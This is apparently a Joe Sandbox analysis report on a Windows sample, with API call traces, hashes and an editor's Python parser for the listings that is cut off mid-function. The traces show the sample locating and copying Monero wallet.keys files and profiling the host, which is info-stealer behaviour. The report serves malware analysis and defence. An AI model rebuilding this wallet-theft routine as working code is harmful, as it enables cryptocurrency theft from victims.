                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3627164727-0
                                                                                                                                                                        • Opcode ID: d47fad2b53ca7759b3b2daa58738b8be2f1797321f3616565b8c451922f83172
                                                                                                                                                                        • Instruction ID: 987632c6cd1b7bc31d6b28348834b15f1d1764396a2ceba27aa91aff4621c207
                                                                                                                                                                        • Opcode Fuzzy Hash: d47fad2b53ca7759b3b2daa58738b8be2f1797321f3616565b8c451922f83172
                                                                                                                                                                        • Instruction Fuzzy Hash: C2014272402824BB87177BA1ED4DDDF3F6CEF4E3927140245F60A914208B798686CBFA
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0019BA0A
                                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0019BA83
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0019BA9F
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0019BAB3
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0019BABC
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0019BACC
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0019BAEA
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0019BAFA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2979504256-3916222277
                                                                                                                                                                        • Opcode ID: a97f90e6c042f64ea212252e86e9629f0a9e1b7af1e4eb145b214c01c5a19598
                                                                                                                                                                        • Instruction ID: cf391fee9442a4c2b7dc956c623a21f2858d27dc12bbcbeeb28a9068d8336481
                                                                                                                                                                        • Opcode Fuzzy Hash: a97f90e6c042f64ea212252e86e9629f0a9e1b7af1e4eb145b214c01c5a19598
                                                                                                                                                                        • Instruction Fuzzy Hash: 2851F2B1D04218AFDF29DFA9E9C1AAEBBB9FB48304F10442AE512E7260D7749D45CF50
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00181ADC
                                                                                                                                                                          • Part of subcall function 00181A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00181A65
                                                                                                                                                                          • Part of subcall function 00181A51: HeapAlloc.KERNEL32(00000000), ref: 00181A6C
                                                                                                                                                                          • Part of subcall function 00181A51: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00181AE9), ref: 00181A89
                                                                                                                                                                          • Part of subcall function 00181A51: RegQueryValueExA.ADVAPI32(00181AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00181AA4
                                                                                                                                                                          • Part of subcall function 00181A51: RegCloseKey.ADVAPI32(00181AE9), ref: 00181AAD
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00181AF1
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00181AFE
                                                                                                                                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00181B19
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 00181C2A
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00181C9D
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                        • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                        • API String ID: 615783205-3586502688
                                                                                                                                                                        • Opcode ID: 3d716807d6723b0d938bebfed008e2f997b37491673b866293a101f58ec72f68
                                                                                                                                                                        • Instruction ID: 680037c701629713974c2d36eb574198f4aa937e36ad5d798ccd2b7135c4cdc4
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d716807d6723b0d938bebfed008e2f997b37491673b866293a101f58ec72f68
                                                                                                                                                                        • Instruction Fuzzy Hash: B651A672D5012D9BCF22BB64EC46ADD77B8AF24304F4144A5F608B7152DB30AF868F54
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0018DB90
                                                                                                                                                                        • strchr.MSVCRT ref: 0018DBA2
                                                                                                                                                                        • strchr.MSVCRT ref: 0018DBC7
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0018DCCC), ref: 0018DBE9
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018DBF6
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0018DCCC), ref: 0018DBFD
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018DC44
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                                                                                        • String ID: 0123456789ABCDEF
                                                                                                                                                                        • API String ID: 453150750-2554083253
                                                                                                                                                                        • Opcode ID: 1a028c021f2acf466bb046142eb739d58e8506898a7dc3a4c7c2efd6aa81fbeb
                                                                                                                                                                        • Instruction ID: f6a9eb811fa6b0c67d3a9fa21d752cd625d3565a59c4dbc81846361923722cd2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1a028c021f2acf466bb046142eb739d58e8506898a7dc3a4c7c2efd6aa81fbeb
                                                                                                                                                                        • Instruction Fuzzy Hash: 073181729002199FDB01EFE8DC49AEEBBB9EF49311F110169F901FB181DB75AA45CB50
APIs
• UnDecorator::getArgumentList.LIBCMT ref: 0019F9B7
  • Part of subcall function 0019F552: Replicator::operator[].LIBCMT ref: 0019F5D5
  • Part of subcall function 0019F552: DName::operator+=.LIBCMT ref: 0019F5DD
• DName::operator+.LIBCMT ref: 0019FA10
• DName::DName.LIBCMT ref: 0019FA68
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
• String ID: ,...$,<ellipsis>$...$<ellipsis>$void
• API String ID: 834187326-2211150622
• Opcode ID: d501407307fe1fee96d32b7a0abe341d8289cbda0ef6d817f780a151e28ff0cc
• Instruction ID: 9026671aa95dd295f750728ec5a576a6407af369286745f91f812bae3371a6af
• Opcode Fuzzy Hash: d501407307fe1fee96d32b7a0abe341d8289cbda0ef6d817f780a151e28ff0cc
• Instruction Fuzzy Hash: 17215970742244BFCF05DF18E9449A97BE4FB45348B4480A9E849DB266CB30EA43CB41
APIs
• UnDecorator::UScore.LIBCMT ref: 001A1335
• DName::DName.LIBCMT ref: 001A1341
  • Part of subcall function 0019F00C: DName::doPchar.LIBCMT ref: 0019F03D
• UnDecorator::getScopedName.LIBCMT ref: 001A1380
• DName::operator+=.LIBCMT ref: 001A138A
• DName::operator+=.LIBCMT ref: 001A1399
• DName::operator+=.LIBCMT ref: 001A13A5
• DName::operator+=.LIBCMT ref: 001A13B2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
• String ID: void
• API String ID: 1480779885-3531332078
• Opcode ID: d49df154aa80fcbdd0cb36a2b54b1621918db420cfb0f7a23025eec75fa98aaf
• Instruction ID: d10686a721753088862ea3d127a61dbc2b586203d04042a7bb86f100eb05b77f
• Opcode Fuzzy Hash: d49df154aa80fcbdd0cb36a2b54b1621918db420cfb0f7a23025eec75fa98aaf
• Instruction Fuzzy Hash: A7118276D04148BFCF19EF64C85AAAD7BA4FF21311F0840A9E006DB6E6DB70DA45C741
APIs
• CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0019154A
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00191555
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00191560
• ReleaseDC.USER32(00000000,00000000), ref: 0019156B
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC), ref: 00191577
• HeapAlloc.KERNEL32(00000000,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 0019157E
• wsprintfA.USER32 ref: 00191590
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
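The function at 0019154A is the sample's host-profiling routine: it opens a display DC with CreateDCA, reads GetDeviceCaps index 8 and index 10 (HORZRES and VERTRES in wingdi.h), releases the DC, and allocates a heap buffer while the labels Display Resolution: , User Name: , Computer Name: , AV: and Install Date: sit on the stack, with a %dx%d format under String ID for the wsprintfA call. Reading such call listings by eye across a long report is slow, so the following Python is an added example by the editor, not code from Joe Sandbox or from the sample. It parses the bullet lines of one function entry into records, decodes hex dwords and ? placeholders, names the GetDeviceCaps indices from the wingdi.h constants, and collects the label strings as a triage summary. The sample input is copied from this entry and embedded inline; the Call record, the label heuristic (string arguments ending in ": ") and the one-function-per-listing assumption are the example's own, and the argument splitter assumes, as this report's lines do, that string literals contain no commas.

```python
"""Parse and triage the API listing of one function entry in a Joe Sandbox report.

Added example; not part of the report or of the analysed sample. The input below
is copied from the function at 0019154A on this page; everything else is the
editor's own (Call record, label heuristic, summary layout).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

Arg = Union[int, str, None]  # 32-bit hex dword, string literal, or '?' (unknown)

# Constructed input: the bullet lines of the function at 0019154A as printed in
# this report. Trailing spaces inside the string arguments are part of the data.
SAMPLE_LISTING = """\
• CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0019154A
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00191555
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00191560
• ReleaseDC.USER32(00000000,00000000), ref: 0019156B
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC), ref: 00191577
• HeapAlloc.KERNEL32(00000000,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 0019157E
• wsprintfA.USER32 ref: 00191590
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
"""

# GetDeviceCaps index constants from wingdi.h (subset).
DEVICE_CAPS: Dict[int, str] = {
    0: "DRIVERVERSION", 2: "TECHNOLOGY", 4: "HORZSIZE", 6: "VERTSIZE",
    8: "HORZRES", 10: "VERTRES", 12: "BITSPIXEL", 14: "PLANES",
    88: "LOGPIXELSX", 90: "LOGPIXELSY",
}


@dataclass
class Call:
    name: str                      # API or CRT symbol, e.g. GetDeviceCaps or DName::operator+=
    module: str                    # GDI32, KERNEL32, USER32, LIBCMT, ...
    args: List[Arg]                # decoded arguments in call order; [] when the report shows none
    ref: int                       # address of the call site
    parent: Optional[int] = None   # set for "Part of subcall function XXXXXXXX" lines


# One report line: optional subcall prefix, symbol.MODULE, optional (args), ref: address
_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>.+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def _decode_arg(tok: str) -> Arg:
    """'?' -> None, 8 hex digits -> int, anything else is an unquoted string literal."""
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_listing(text: str) -> List[Call]:
    """Turn the bullet lines of one function entry into Call records, in report order."""
    calls: List[Call] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = m.group("args")
        calls.append(Call(
            name=m.group("name"),
            module=m.group("module"),
            args=[_decode_arg(t) for t in args.split(",")] if args else [],
            ref=int(m.group("ref"), 16),
            parent=int(m.group("parent"), 16) if m.group("parent") else None,
        ))
    return calls


def device_caps_queried(calls: List[Call]) -> List[str]:
    """Names of the GetDeviceCaps indices the function reads (second argument)."""
    names = []
    for c in calls:
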